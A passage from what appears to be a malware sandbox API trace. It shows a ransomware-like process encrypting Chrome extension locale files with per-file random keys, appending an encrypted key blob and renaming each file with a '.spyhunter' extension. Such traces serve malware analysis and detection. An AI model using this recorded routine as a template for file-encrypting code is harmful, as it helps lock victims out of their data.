Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.469] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.spyhunter") returned 167 [0135.469] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.spyhunter")) returned 1 [0135.471] GetProcessHeap () returned 0x2c0000 [0135.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.471] GetProcessHeap () returned 0x2c0000 [0135.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0135.471] GetProcessHeap () returned 0x2c0000 [0135.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81d50 | out: hHeap=0x2c0000) returned 1 [0135.473] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f2e8 | out: pbBuffer=0x270f2e8) returned 1 [0135.473] GetProcessHeap () returned 0x2c0000 [0135.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0135.473] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f2e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f2e0*=0x30) returned 1 [0135.473] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0135.474] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json") returned 157 [0135.474] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.474] GetProcessHeap () returned 0x2c0000 [0135.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0135.474] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f2a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f2a4*=0xb3, lpOverlapped=0x0) returned 1 [0135.475] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.475] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x270f2a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f2a4*=0xb3, lpOverlapped=0x0) returned 1 [0135.475] GetProcessHeap () returned 0x2c0000 [0135.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0135.475] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.475] WriteFile (in: hFile=0x17c, lpBuffer=0x270f2e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f2a4, lpOverlapped=0x0 | out: lpBuffer=0x270f2e4*, lpNumberOfBytesWritten=0x270f2a4*=0x4, lpOverlapped=0x0) returned 1 [0135.475] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f2a4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f2a4*=0x30, lpOverlapped=0x0) returned 1 [0135.476] CloseHandle (hObject=0x17c) returned 1 [0135.476] GetProcessHeap () returned 0x2c0000 [0135.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.476] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.spyhunter") returned 167 [0135.476] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.spyhunter")) returned 1 [0135.477] GetProcessHeap () returned 0x2c0000 [0135.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.477] GetProcessHeap () returned 0x2c0000 [0135.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0135.477] GetProcessHeap () returned 0x2c0000 [0135.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81bc8 | out: hHeap=0x2c0000) returned 1 [0135.478] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f2e0 | out: pbBuffer=0x270f2e0) returned 1 [0135.478] GetProcessHeap () returned 0x2c0000 [0135.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0135.478] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f2d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f2d8*=0x30) returned 1 [0135.478] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0135.479] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json") returned 157 [0135.479] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.479] GetProcessHeap () returned 0x2c0000 [0135.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0135.479] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f29c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f29c*=0xb3, lpOverlapped=0x0) returned 1 [0135.480] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.480] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x270f29c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f29c*=0xb3, lpOverlapped=0x0) returned 1 [0135.480] GetProcessHeap () returned 0x2c0000 [0135.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0135.480] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.480] WriteFile (in: hFile=0x17c, lpBuffer=0x270f2dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f29c, lpOverlapped=0x0 | out: lpBuffer=0x270f2dc*, lpNumberOfBytesWritten=0x270f29c*=0x4, lpOverlapped=0x0) returned 1 [0135.480] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f29c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f29c*=0x30, lpOverlapped=0x0) returned 1 [0135.480] CloseHandle (hObject=0x17c) returned 1 [0135.481] GetProcessHeap () returned 0x2c0000 [0135.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.481] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.spyhunter") returned 167 [0135.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.spyhunter")) returned 1 [0135.481] GetProcessHeap () returned 0x2c0000 [0135.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.482] GetProcessHeap () returned 0x2c0000 [0135.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0135.482] GetProcessHeap () returned 0x2c0000 [0135.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81a40 | out: hHeap=0x2c0000) returned 1 [0135.483] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f2d8 | out: pbBuffer=0x270f2d8) returned 1 [0135.483] GetProcessHeap () returned 0x2c0000 [0135.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0135.483] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f2d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f2d0*=0x30) returned 1 [0135.483] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0135.484] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json") returned 157 [0135.484] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.484] GetProcessHeap () returned 0x2c0000 [0135.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0135.484] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f294, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f294*=0xb3, lpOverlapped=0x0) returned 1 [0135.485] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.485] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x270f294, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f294*=0xb3, lpOverlapped=0x0) returned 1 [0135.485] GetProcessHeap () returned 0x2c0000 [0135.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0135.485] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.485] WriteFile (in: hFile=0x17c, lpBuffer=0x270f2d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f294, lpOverlapped=0x0 | out: lpBuffer=0x270f2d4*, lpNumberOfBytesWritten=0x270f294*=0x4, lpOverlapped=0x0) returned 1 [0135.485] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f294, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f294*=0x30, lpOverlapped=0x0) returned 1 [0135.486] CloseHandle (hObject=0x17c) returned 1 [0135.486] GetProcessHeap () returned 0x2c0000 [0135.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.486] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.spyhunter") returned 167 [0135.486] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.spyhunter")) returned 1 [0135.487] GetProcessHeap () returned 0x2c0000 [0135.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.487] GetProcessHeap () returned 0x2c0000 [0135.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0135.487] GetProcessHeap () returned 0x2c0000 [0135.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f818b8 | out: hHeap=0x2c0000) returned 1 [0135.488] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f2d0 | out: pbBuffer=0x270f2d0) returned 1 [0135.488] GetProcessHeap () returned 0x2c0000 [0135.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0135.488] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f2c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f2c8*=0x30) returned 1 [0135.488] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0135.489] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json") returned 157 [0135.489] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.489] GetProcessHeap () returned 0x2c0000 [0135.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0135.489] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f28c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f28c*=0xb3, lpOverlapped=0x0) returned 1 [0135.490] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.490] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x270f28c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f28c*=0xb3, lpOverlapped=0x0) returned 1 [0135.490] GetProcessHeap () returned 0x2c0000 [0135.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0135.490] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.490] WriteFile (in: hFile=0x17c, lpBuffer=0x270f2cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f28c, lpOverlapped=0x0 | out: lpBuffer=0x270f2cc*, lpNumberOfBytesWritten=0x270f28c*=0x4, lpOverlapped=0x0) returned 1 [0135.490] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f28c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f28c*=0x30, lpOverlapped=0x0) returned 1 [0135.490] CloseHandle (hObject=0x17c) returned 1 [0135.490] GetProcessHeap () returned 0x2c0000 [0135.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.490] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.spyhunter") returned 167 [0135.490] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.spyhunter")) returned 1 [0135.491] GetProcessHeap () returned 0x2c0000 [0135.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.491] GetProcessHeap () returned 0x2c0000 [0135.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0135.491] GetProcessHeap () returned 0x2c0000 [0135.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81730 | out: hHeap=0x2c0000) returned 1 [0135.493] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f2c8 | out: pbBuffer=0x270f2c8) returned 1 [0135.493] GetProcessHeap () returned 0x2c0000 [0135.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0135.493] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f2c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f2c0*=0x30) returned 1 [0135.493] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0135.493] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json") returned 157 [0135.493] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.493] GetProcessHeap () returned 0x2c0000 [0135.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0135.493] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f284, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f284*=0xb3, lpOverlapped=0x0) returned 1 [0135.494] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.494] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x270f284, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f284*=0xb3, lpOverlapped=0x0) returned 1 [0135.494] GetProcessHeap () returned 0x2c0000 [0135.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0135.494] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.495] WriteFile (in: hFile=0x17c, lpBuffer=0x270f2c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f284, lpOverlapped=0x0 | out: lpBuffer=0x270f2c4*, lpNumberOfBytesWritten=0x270f284*=0x4, lpOverlapped=0x0) returned 1 [0135.495] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f284, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f284*=0x30, lpOverlapped=0x0) returned 1 [0135.495] CloseHandle (hObject=0x17c) returned 1 [0135.495] GetProcessHeap () returned 0x2c0000 [0135.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.495] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.spyhunter") returned 167 [0135.495] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.spyhunter" (normalized: 